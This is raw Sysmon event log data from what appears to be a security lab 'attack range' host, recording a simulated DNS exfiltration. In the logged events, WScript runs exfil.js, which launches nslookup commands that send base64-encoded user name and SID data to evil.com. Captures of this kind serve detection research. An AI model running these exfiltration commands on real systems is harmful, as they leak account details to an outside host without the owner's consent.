14:16:45.641{2E1864BB-17A1-629A-783D-000000005F02}55528064C:\Windows\System32\WScript.exe{2E1864BB-17CD-629A-0042-000000005F02}2568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.641{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.641{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.641{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.641{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.646{2E1864BB-17CD-629A-0042-000000005F02}2568C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhgy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.641{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlppt.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000204316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.082{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53097- 354300x8000000000000000204315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.081{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53096- 354300x8000000000000000204314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.081{00000000-0000-0000-0000-000000000000}3008<unknown process>-udptruefalse127.0.0.1-53096-false127.0.0.1-53domain 354300x8000000000000000204313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.081{00000000-0000-0000-0000-000000000000}3008<unknown process>-udpfalsefalse127.0.0.1-53095-false127.0.0.1-53domain 354300x8000000000000000204312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.081{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53095- 354300x8000000000000000204311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.081{00000000-0000-0000-0000-000000000000}3008<unknown process>-udptruefalse127.0.0.1-53095-false127.0.0.1-53domain 354300x8000000000000000204310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.985{00000000-0000-0000-0000-000000000000}2240<unknown process>-udpfalsefalse127.0.0.1-53094-false127.0.0.1-53domain 354300x8000000000000000204309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.985{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53094- 354300x8000000000000000204308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.985{00000000-0000-0000-0000-000000000000}2240<unknown process>-udptruefalse127.0.0.1-53094-false127.0.0.1-53domain 354300x8000000000000000204307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.985{00000000-0000-0000-0000-000000000000}2240<unknown process>-udpfalsefalse127.0.0.1-53093-false127.0.0.1-53domain 354300x8000000000000000204306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.984{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53093- 354300x8000000000000000204305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.984{00000000-0000-0000-0000-000000000000}2240<unknown process>-udptruefalse127.0.0.1-53093-false127.0.0.1-53domain 10341000x8000000000000000204304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.610{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000204303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.984{00000000-0000-0000-0000-000000000000}2240<unknown process>-udpfalsefalse127.0.0.1-53092-false127.0.0.1-53domain 354300x8000000000000000204302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.984{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53092- 354300x8000000000000000204301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.984{00000000-0000-0000-0000-000000000000}2240<unknown process>-udptruefalse127.0.0.1-53092-false127.0.0.1-53domain 10341000x8000000000000000204300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.610{2E1864BB-17CD-629A-FE41-000000005F02}26166424C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-FF41-000000005F02}8124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000204299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.845{00000000-0000-0000-0000-000000000000}6652<unknown process>-udpfalsefalse127.0.0.1-53091-false127.0.0.1-53domain 354300x8000000000000000204298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.845{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53091- 354300x8000000000000000204297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.845{00000000-0000-0000-0000-000000000000}6652<unknown process>-udptruefalse127.0.0.1-53091-false127.0.0.1-53domain 354300x8000000000000000204296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.845{00000000-0000-0000-0000-000000000000}6652<unknown process>-udpfalsefalse127.0.0.1-53090-false127.0.0.1-53domain 354300x8000000000000000204295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.845{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53090- 10341000x8000000000000000204294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.610{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000204293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.844{00000000-0000-0000-0000-000000000000}6652<unknown process>-udptruefalse127.0.0.1-53090-false127.0.0.1-53domain 354300x8000000000000000204292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.844{00000000-0000-0000-0000-000000000000}6652<unknown process>-udpfalsefalse127.0.0.1-53089-false127.0.0.1-53domain 10341000x8000000000000000204291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.610{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000204290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.844{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53089- 354300x8000000000000000204289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.844{00000000-0000-0000-0000-000000000000}6652<unknown process>-udptruefalse127.0.0.1-53089-false127.0.0.1-53domain 10341000x8000000000000000204288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.610{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.610{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-FF41-000000005F02}8124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000204286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.760{00000000-0000-0000-0000-000000000000}7700<unknown process>-udpfalsefalse127.0.0.1-53088-false127.0.0.1-53domain 354300x8000000000000000204285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.760{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53088- 354300x8000000000000000204284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.760{00000000-0000-0000-0000-000000000000}7700<unknown process>-udptruefalse127.0.0.1-53088-false127.0.0.1-53domain 10341000x8000000000000000204283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.610{2E1864BB-17CD-629A-FD41-000000005F02}59566688C:\Windows\system32\cmd.exe{2E1864BB-17CD-629A-FF41-000000005F02}8124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000204282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.760{00000000-0000-0000-0000-000000000000}7700<unknown process>-udpfalsefalse127.0.0.1-53087-false127.0.0.1-53domain 354300x8000000000000000204281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.760{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53087- 354300x8000000000000000204280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.760{00000000-0000-0000-0000-000000000000}7700<unknown process>-udptruefalse127.0.0.1-53087-false127.0.0.1-53domain 154100x8000000000000000204279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.611{2E1864BB-17CD-629A-FF41-000000005F02}8124C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CD-629A-FD41-000000005F02}5956C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlppt.tmp 2>&1 354300x8000000000000000204278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.760{00000000-0000-0000-0000-000000000000}7700<unknown process>-udpfalsefalse127.0.0.1-53086-false127.0.0.1-53domain 354300x8000000000000000204277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.760{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53086- 354300x8000000000000000204276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.760{00000000-0000-0000-0000-000000000000}7700<unknown process>-udptruefalse127.0.0.1-53086-false127.0.0.1-53domain 354300x8000000000000000204275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.669{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53085- 354300x8000000000000000204274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.669{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53084- 354300x8000000000000000204273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.668{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53083- 354300x8000000000000000204272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.668{00000000-0000-0000-0000-000000000000}7060<unknown process>-udptruefalse127.0.0.1-53083-false127.0.0.1-53domain 354300x8000000000000000204271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.585{00000000-0000-0000-0000-000000000000}7848<unknown process>-udpfalsefalse127.0.0.1-53082-false127.0.0.1-53domain 354300x8000000000000000204270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.585{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53082- 354300x8000000000000000204269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.585{00000000-0000-0000-0000-000000000000}7848<unknown process>-udptruefalse127.0.0.1-53082-false127.0.0.1-53domain 354300x8000000000000000204268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.585{00000000-0000-0000-0000-000000000000}7848<unknown process>-udpfalsefalse127.0.0.1-53081-false127.0.0.1-53domain 354300x8000000000000000204267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.585{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53081- 10341000x8000000000000000204266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.563{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-FE41-000000005F02}2616C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000204265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.585{00000000-0000-0000-0000-000000000000}7848<unknown process>-udptruefalse127.0.0.1-53081-false127.0.0.1-53domain 10341000x8000000000000000204264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.563{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-FE41-000000005F02}2616C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000204263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.583{00000000-0000-0000-0000-000000000000}7848<unknown process>-udpfalsefalse127.0.0.1-53080-false127.0.0.1-53domain 354300x8000000000000000204262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.582{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53080- 354300x8000000000000000204261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.582{00000000-0000-0000-0000-000000000000}7848<unknown process>-udptruefalse127.0.0.1-53080-false127.0.0.1-53domain 